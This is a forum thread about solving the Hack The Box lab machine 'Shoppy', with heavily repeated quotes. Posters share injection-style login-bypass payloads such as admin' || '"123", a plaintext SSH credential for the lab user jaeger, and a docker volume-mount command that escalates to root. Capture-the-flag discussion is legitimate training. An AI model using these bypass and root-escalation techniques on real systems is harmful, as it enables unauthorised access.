Shoppy - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
I figured out why this payload is needed.

Example alternatives:
admin' || '"123"
admin' || '"anything_in_here_except_single_quotes"

josh' || '""
admin' || '""

Unfortunately this type of payload does not seem to be on any major sites.

It would also be possiple to brute force the username using this payload using fuff.
Reply
(September 17, 2022, 11:37 PM)wesleyjones001 Wrote: I figured out why this payload is needed.

Example alternatives:
admin' || '"123"
admin' || '"anything_in_here_except_single_quotes"

josh' || '""
admin' || '""


Unfortunately this type of payload does not seem to be on any major sites.

It would also be possiple to brute force the username using this payload using fuff.


Sample was a deploy's password??


(September 17, 2022, 11:32 PM)ysoserious Wrote:
(September 17, 2022, 11:31 PM)dumpster Wrote:
(September 17, 2022, 11:30 PM)ysoserious Wrote: How did u guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine. But not for this one.


Did you get the root


Yes


how you guys found a password fo deploy?
Reply
(September 17, 2022, 11:40 PM)hack5sucks Wrote:
(September 17, 2022, 11:37 PM)wesleyjones001 Wrote: I figured out why this payload is needed.

Example alternatives:
admin' || '"123"
admin' || '"anything_in_here_except_single_quotes"

josh' || '""
admin' || '""


Unfortunately this type of payload does not seem to be on any major sites.

It would also be possiple to brute force the username using this payload using fuff.


Sample was a deploy's password??


(September 17, 2022, 11:32 PM)ysoserious Wrote:
(September 17, 2022, 11:31 PM)dumpster Wrote:
(September 17, 2022, 11:30 PM)ysoserious Wrote: How did u guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine. But not for this one.


Did you get the root


Yes


how you guys found a password fo deploy?


Read the Development Channel in Mattermost carefully
Reply
that box must have been stupid easy cause theres already a writeup on github lmao
Reply
(September 18, 2022, 12:54 AM)YungStubble Wrote: that box must have been stupid easy cause theres already a writeup on github lmao

yeah i found one on github also
Reply
(September 17, 2022, 11:40 PM)hack5sucks Wrote:
(September 17, 2022, 11:37 PM)wesleyjones001 Wrote: I figured out why this payload is needed.

Example alternatives:
admin' || '"123"
admin' || '"anything_in_here_except_single_quotes"

josh' || '""
admin' || '""


Unfortunately this type of payload does not seem to be on any major sites.

It would also be possiple to brute force the username using this payload using fuff.


Sample was a deploy's password??


(September 17, 2022, 11:32 PM)ysoserious Wrote:
(September 17, 2022, 11:31 PM)dumpster Wrote:
(September 17, 2022, 11:30 PM)ysoserious Wrote: How did u guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine. But not for this one.


Did you get the root


Yes


how you guys found a password fo deploy?

SSH into jaeger:Sh0ppyBest@pp!
Do cd ~
Then,
sudo /home/deploy/password-manager -u 'deploy'
Now read the creds
And SSH as deploy
using gtfo we have
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
rooted!! (:
                             
     
Reply
WOW, really didnt like this box.

Wondering how you guys sniffed out a couple things:

1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
Reply
(September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.

Wondering how you guys sniffed out a couple things:

1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain


same bro
Reply
unable to root
Reply
(September 18, 2022, 03:02 AM)7r4c3 Wrote:
(September 17, 2022, 11:40 PM)hack5sucks Wrote:
(September 17, 2022, 11:37 PM)wesleyjones001 Wrote: I figured out why this payload is needed.

Example alternatives:
admin' || '"123"
admin' || '"anything_in_here_except_single_quotes"

josh' || '""
admin' || '""


Unfortunately this type of payload does not seem to be on any major sites.

It would also be possiple to brute force the username using this payload using fuff.


Sample was a deploy's password??


(September 17, 2022, 11:32 PM)ysoserious Wrote:
(September 17, 2022, 11:31 PM)dumpster Wrote:
(September 17, 2022, 11:30 PM)ysoserious Wrote: How did u guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine. But not for this one.


Did you get the root


Yes


how you guys found a password fo deploy?

SSH into jaeger:Sh0ppyBest@pp!
Do cd ~
Then,
sudo /home/deploy/password-manager -u 'deploy'
Now read the creds
And SSH as deploy
using gtfo we have
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
rooted!! (:


mine is showing that user jaeger is not allowed to execute this as root.
Reply


 Users viewing this thread: Shoppy - HTB [Discussion]: No users currently viewing.